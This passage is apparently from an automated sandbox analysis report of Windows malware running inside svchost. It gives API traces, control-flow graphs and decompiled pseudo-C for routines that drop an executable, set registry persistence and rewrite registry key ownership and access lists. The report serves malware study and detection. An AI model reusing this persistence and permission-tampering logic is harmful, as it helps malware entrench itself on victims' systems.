                                                                                                                                    • Part of subcall function 0251EC54: GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0251EC72
                                                                                                                                    • Part of subcall function 0251EC54: GetTickCount.KERNEL32 ref: 0251EC78
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 02519AB3
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 02519ABA
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 02519AFD
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 02519B99
                                                                                                                                  • ExitProcess.KERNEL32 ref: 02519C06
                                                                                                                                  • GetTempPathA.KERNEL32(000001F4,?), ref: 02519CAC
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 02519D7A
                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 02519D8B
                                                                                                                                  • lstrcatA.KERNEL32(?,0252070C), ref: 02519D9D
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 02519DED
                                                                                                                                  • DeleteFileA.KERNEL32(00000022), ref: 02519E38
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 02519E6F
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 02519EC8
                                                                                                                                  • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 02519ED5
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 02519F3B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 02519F5E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 02519F6A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 02519FAD
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 02519FB4
                                                                                                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 02519FFE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0251A038
                                                                                                                                  • lstrcatA.KERNEL32(00000022,02520A34), ref: 0251A05E
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000022), ref: 0251A072
                                                                                                                                  • lstrcatA.KERNEL32(00000022,02520A34), ref: 0251A08D
                                                                                                                                  • wsprintfA.USER32 ref: 0251A0B6
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0251A0DE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,?), ref: 0251A0FD
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0251A120
                                                                                                                                  • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0251A131
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0251A174
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 0251A17B
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 0251A1B6
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0251A1E5
                                                                                                                                    • Part of subcall function 025199D2: lstrcpyA.KERNEL32(?,?,00000100,025222F8,00000000,?,02519E9D,?,00000022,?,?,?,?,?,?,?), ref: 025199DF
                                                                                                                                    • Part of subcall function 025199D2: lstrcatA.KERNEL32(00000022,00000000,?,?,02519E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 02519A3C
                                                                                                                                    • Part of subcall function 025199D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,02519E9D,?,00000022,?,?,?), ref: 02519A52
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0251A288
                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0251A3B7
                                                                                                                                  • GetLastError.KERNEL32 ref: 0251A3ED
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0251A400
                                                                                                                                  • DeleteFileA.KERNEL32(025233D8), ref: 0251A407
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0251405E,00000000,00000000,00000000), ref: 0251A42C
                                                                                                                                  • WSAStartup.WS2_32(00001010,?), ref: 0251A43A
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0251877E,00000000,00000000,00000000), ref: 0251A469
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0251A48A
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A49F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4B7
                                                                                                                                  • Sleep.KERNEL32(00001A90), ref: 0251A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D$P$\$ghrubsm
                                                                                                                                  • API String ID: 2089075347-772048286
                                                                                                                                  • Opcode ID: 7964c0a05975bea64c2f2b51053ec5ded7c38b8bd5d8149a5fab50ae02e8fbe5
                                                                                                                                  • Instruction ID: 9cff27e52e893545b7b466fb10f902eedeed5d714d75e821715f89b056f05b02
                                                                                                                                  • Opcode Fuzzy Hash: 7964c0a05975bea64c2f2b51053ec5ded7c38b8bd5d8149a5fab50ae02e8fbe5
                                                                                                                                  • Instruction Fuzzy Hash: 0352A4B1D4125AAFFB21DFA0CC49EEE7BBDBB45304F0445A5E509E2180E7709A48CF69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251199C Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 905 251199c-25119cc inet_addr LoadLibraryA 906 25119d5-25119fe GetProcAddress * 3 905->906 907 25119ce-25119d0 905->907 909 2511ab3-2511ab6 FreeLibrary 906->909 910 2511a04-2511a06 906->910 908 2511abf-2511ac2 907->908 912 2511abc 909->912 910->909 911 2511a0c-2511a0e 910->911 911->909 913 2511a14-2511a28 GetBestInterface GetProcessHeap 911->913 914 2511abe 912->914 913->912 915 2511a2e-2511a40 HeapAlloc 913->915 914->908 915->912 916 2511a42-2511a50 GetAdaptersInfo 915->916 917 2511a62-2511a67 916->917 918 2511a52-2511a60 HeapReAlloc 916->918 919 2511aa1-2511aad FreeLibrary 917->919 920 2511a69-2511a73 GetAdaptersInfo 917->920 918->917 919->912 922 2511aaf-2511ab1 919->922 920->919 921 2511a75 920->921 923 2511a77-2511a80 921->923 922->914 924 2511a82-2511a86 923->924 925 2511a8a-2511a91 923->925 924->923 926 2511a88 924->926 927 2511a93 925->927 928 2511a96-2511a9b HeapFree 925->928 926->928 927->928 928->919
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0251199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t27 = LoadLibraryA("Iphlpapi.dll"); // executed
				_t48 = _t27;
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20); // executed
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50); // executed
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}

















                                                                                                                                  0x025119ab
                                                                                                                                  0x025119ae
                                                                                                                                  0x025119b1
                                                                                                                                  0x025119bc
                                                                                                                                  0x025119bf
                                                                                                                                  0x025119c5
                                                                                                                                  0x025119c7
                                                                                                                                  0x025119cc
                                                                                                                                  0x025119ea
                                                                                                                                  0x025119f7
                                                                                                                                  0x025119f9
                                                                                                                                  0x025119fe
                                                                                                                                  0x02511ab6
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a14
                                                                                                                                  0x02511a1b
                                                                                                                                  0x02511a1d
                                                                                                                                  0x02511a23
                                                                                                                                  0x02511a28
                                                                                                                                  0x02511abc
                                                                                                                                  0x02511abc
                                                                                                                                  0x02511abe
                                                                                                                                  0x00000000
                                                                                                                                  0x02511abe
                                                                                                                                  0x02511a3c
                                                                                                                                  0x02511a40
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a45
                                                                                                                                  0x02511a46
                                                                                                                                  0x02511a47
                                                                                                                                  0x02511a50
                                                                                                                                  0x02511a60
                                                                                                                                  0x02511a60
                                                                                                                                  0x02511a67
                                                                                                                                  0x02511aa1
                                                                                                                                  0x02511aa4
                                                                                                                                  0x02511aad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511aaf
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a69
                                                                                                                                  0x02511a6c
                                                                                                                                  0x02511a6d
                                                                                                                                  0x02511a73
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a75
                                                                                                                                  0x02511a77
                                                                                                                                  0x02511a82
                                                                                                                                  0x02511a86
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a96
                                                                                                                                  0x02511a9b
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a9b
                                                                                                                                  0x02511a91
                                                                                                                                  0x02511a93
                                                                                                                                  0x02511a93
                                                                                                                                  0x00000000
                                                                                                                                  0x02511a91
                                                                                                                                  0x02511a67
                                                                                                                                  0x025119fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(123.45.67.89), ref: 025119B1
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,02511E9E), ref: 025119BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 025119E2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 025119ED
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 025119F9
                                                                                                                                  • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,02511E9E), ref: 02511A1B
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000001,02511E9E), ref: 02511A1D
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,02511E9E), ref: 02511A36
                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A4A
                                                                                                                                  • HeapReAlloc.KERNEL32(?,00000000,00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A5A
                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,02511E9E,?,?,?,?,00000001,02511E9E), ref: 02511A6E
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,02511E9E), ref: 02511A9B
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,02511E9E), ref: 02511AA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                                                                  • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                                                                  • API String ID: 293628436-270533642
                                                                                                                                  • Opcode ID: c080a8b8f8c440dd1e9cd7a611a03d5a496fe22a732974bc5e28bd5007aea998
                                                                                                                                  • Instruction ID: f17c8dab92996cfa280616ee8817a1a0bd1f464d32dd4121bcb66c460e7420ad
                                                                                                                                  • Opcode Fuzzy Hash: c080a8b8f8c440dd1e9cd7a611a03d5a496fe22a732974bc5e28bd5007aea998
                                                                                                                                  • Instruction Fuzzy Hash: 0C319232D01619AFEF119FE0CD888BEBFB9FF55211F1545BAE605A21C0D7308A44DBA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02517A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 696 2517a95-2517ac2 RegOpenKeyExA 697 2517ac4-2517ac6 696->697 698 2517acb-2517ae7 GetUserNameA 696->698 699 2517db4-2517db6 697->699 700 2517da7-2517db3 RegCloseKey 698->700 701 2517aed-2517b1e LookupAccountNameA 698->701 700->699 701->700 702 2517b24-2517b43 RegGetKeySecurity 701->702 702->700 703 2517b49-2517b61 GetSecurityDescriptorOwner 702->703 704 2517b63-2517b72 EqualSid 703->704 705 2517bb8-2517bd6 GetSecurityDescriptorDacl 703->705 704->705 706 2517b74-2517b88 LocalAlloc 704->706 707 2517da6 705->707 708 2517bdc-2517be1 705->708 706->705 709 2517b8a-2517b94 InitializeSecurityDescriptor 706->709 707->700 708->707 710 2517be7-2517bf2 708->710 711 2517bb1-2517bb2 LocalFree 709->711 712 2517b96-2517ba4 SetSecurityDescriptorOwner 709->712 710->707 713 2517bf8-2517c08 GetAce 710->713 711->705 712->711 716 2517ba6-2517bab RegSetKeySecurity 712->716 714 2517cc6 713->714 715 2517c0e-2517c1b 713->715 717 2517cc9-2517cd3 714->717 718 2517c1d-2517c2f EqualSid 715->718 719 2517c4f-2517c52 715->719 716->711 717->713 720 2517cd9-2517cdc 717->720 721 2517c31-2517c34 718->721 722 2517c36-2517c38 718->722 723 2517c54-2517c5e 719->723 724 2517c5f-2517c71 EqualSid 719->724 720->707 725 2517ce2-2517ce8 720->725 721->718 721->722 722->719 726 2517c3a-2517c4d DeleteAce 722->726 723->724 727 2517c73-2517c84 724->727 728 2517c86 724->728 729 2517d5a-2517d6e LocalAlloc 725->729 730 2517cea-2517cf0 725->730 726->717 731 2517c8b-2517c8e 727->731 728->731 729->707 735 2517d70-2517d7a InitializeSecurityDescriptor 729->735 730->729 732 2517cf2-2517d0d RegOpenKeyExA 730->732 733 2517c90-2517c96 731->733 734 2517c9d-2517c9f 731->734 732->729 736 2517d0f-2517d16 732->736 733->734 737 2517ca1-2517ca5 734->737 738 2517ca7-2517cc3 734->738 739 2517d7c-2517d8a SetSecurityDescriptorDacl 735->739 740 2517d9f-2517da0 LocalFree 735->740 741 2517d19-2517d1e 736->741 737->714 737->738 738->714 739->740 742 2517d8c-2517d9a RegSetKeySecurity 739->742 740->707 741->741 743 2517d20-2517d52 call 2512544 RegSetValueExA 741->743 742->740 744 2517d9c 742->744 743->729 747 2517d54 743->747 744->740 747->729
                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E02517A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				long _t92;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				_t92 = RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28); // executed
				if(_t92 != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28); // executed
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173); // executed
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x2522cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12); // executed
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E02512544(0x25222f8, 0x25206dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1); // executed
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x2522cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175); // executed
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}




















































                                                                                                                                  0x02517aae
                                                                                                                                  0x02517ab4
                                                                                                                                  0x02517ab7
                                                                                                                                  0x02517aba
                                                                                                                                  0x02517ac2
                                                                                                                                  0x00000000
                                                                                                                                  0x02517ac4
                                                                                                                                  0x02517adc
                                                                                                                                  0x02517adf
                                                                                                                                  0x02517ae5
                                                                                                                                  0x02517ae7
                                                                                                                                  0x02517da7
                                                                                                                                  0x02517daa
                                                                                                                                  0x00000000
                                                                                                                                  0x02517aed
                                                                                                                                  0x02517b0c
                                                                                                                                  0x02517b13
                                                                                                                                  0x02517b16
                                                                                                                                  0x02517b1c
                                                                                                                                  0x02517b1e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b34
                                                                                                                                  0x02517b3b
                                                                                                                                  0x02517b41
                                                                                                                                  0x02517b43
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b59
                                                                                                                                  0x02517b5f
                                                                                                                                  0x02517b61
                                                                                                                                  0x02517bb8
                                                                                                                                  0x02517bcb
                                                                                                                                  0x02517bce
                                                                                                                                  0x02517bd4
                                                                                                                                  0x02517bd6
                                                                                                                                  0x02517da6
                                                                                                                                  0x00000000
                                                                                                                                  0x02517da6
                                                                                                                                  0x02517bdc
                                                                                                                                  0x02517bdf
                                                                                                                                  0x02517be1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517be9
                                                                                                                                  0x02517beb
                                                                                                                                  0x02517bee
                                                                                                                                  0x02517bf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517bf8
                                                                                                                                  0x02517bf8
                                                                                                                                  0x02517c00
                                                                                                                                  0x02517c06
                                                                                                                                  0x02517c08
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x00000000
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517c14
                                                                                                                                  0x02517c16
                                                                                                                                  0x02517c19
                                                                                                                                  0x02517c1b
                                                                                                                                  0x02517c4f
                                                                                                                                  0x02517c4f
                                                                                                                                  0x02517c52
                                                                                                                                  0x02517c57
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c66
                                                                                                                                  0x02517c6c
                                                                                                                                  0x02517c6f
                                                                                                                                  0x02517c71
                                                                                                                                  0x02517c86
                                                                                                                                  0x02517c73
                                                                                                                                  0x02517c78
                                                                                                                                  0x02517c7f
                                                                                                                                  0x02517c7f
                                                                                                                                  0x02517c8b
                                                                                                                                  0x02517c8e
                                                                                                                                  0x02517c90
                                                                                                                                  0x02517c93
                                                                                                                                  0x02517c96
                                                                                                                                  0x02517c96
                                                                                                                                  0x02517c9d
                                                                                                                                  0x02517c9f
                                                                                                                                  0x02517ca7
                                                                                                                                  0x02517ca7
                                                                                                                                  0x02517ca9
                                                                                                                                  0x02517cac
                                                                                                                                  0x02517cb2
                                                                                                                                  0x02517cb2
                                                                                                                                  0x02517cb5
                                                                                                                                  0x02517cc3
                                                                                                                                  0x00000000
                                                                                                                                  0x02517ca1
                                                                                                                                  0x02517ca1
                                                                                                                                  0x02517ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517c1d
                                                                                                                                  0x02517c1d
                                                                                                                                  0x02517c27
                                                                                                                                  0x02517c2d
                                                                                                                                  0x02517c2f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517c31
                                                                                                                                  0x02517c32
                                                                                                                                  0x02517c34
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517c34
                                                                                                                                  0x02517c36
                                                                                                                                  0x02517c38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517c40
                                                                                                                                  0x02517c46
                                                                                                                                  0x02517cc9
                                                                                                                                  0x02517cc9
                                                                                                                                  0x02517cd0
                                                                                                                                  0x02517cd0
                                                                                                                                  0x02517cd9
                                                                                                                                  0x02517cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517ce2
                                                                                                                                  0x02517ce8
                                                                                                                                  0x02517d5a
                                                                                                                                  0x02517d61
                                                                                                                                  0x02517d6a
                                                                                                                                  0x02517d6c
                                                                                                                                  0x02517d6e
                                                                                                                                  0x02517d72
                                                                                                                                  0x02517d78
                                                                                                                                  0x02517d7a
                                                                                                                                  0x02517d82
                                                                                                                                  0x02517d88
                                                                                                                                  0x02517d8a
                                                                                                                                  0x02517d92
                                                                                                                                  0x02517d98
                                                                                                                                  0x02517d9a
                                                                                                                                  0x02517d9c
                                                                                                                                  0x02517d9c
                                                                                                                                  0x02517d9a
                                                                                                                                  0x02517d8a
                                                                                                                                  0x02517da0
                                                                                                                                  0x02517da0
                                                                                                                                  0x00000000
                                                                                                                                  0x02517d6e
                                                                                                                                  0x02517cea
                                                                                                                                  0x02517cf0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517cff
                                                                                                                                  0x02517d05
                                                                                                                                  0x02517d0b
                                                                                                                                  0x02517d0d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517d0f
                                                                                                                                  0x02517d14
                                                                                                                                  0x02517d16
                                                                                                                                  0x02517d19
                                                                                                                                  0x02517d19
                                                                                                                                  0x02517d1b
                                                                                                                                  0x02517d1c
                                                                                                                                  0x02517d1c
                                                                                                                                  0x02517d4a
                                                                                                                                  0x02517d50
                                                                                                                                  0x02517d52
                                                                                                                                  0x02517d54
                                                                                                                                  0x02517d54
                                                                                                                                  0x00000000
                                                                                                                                  0x02517d52
                                                                                                                                  0x02517b6a
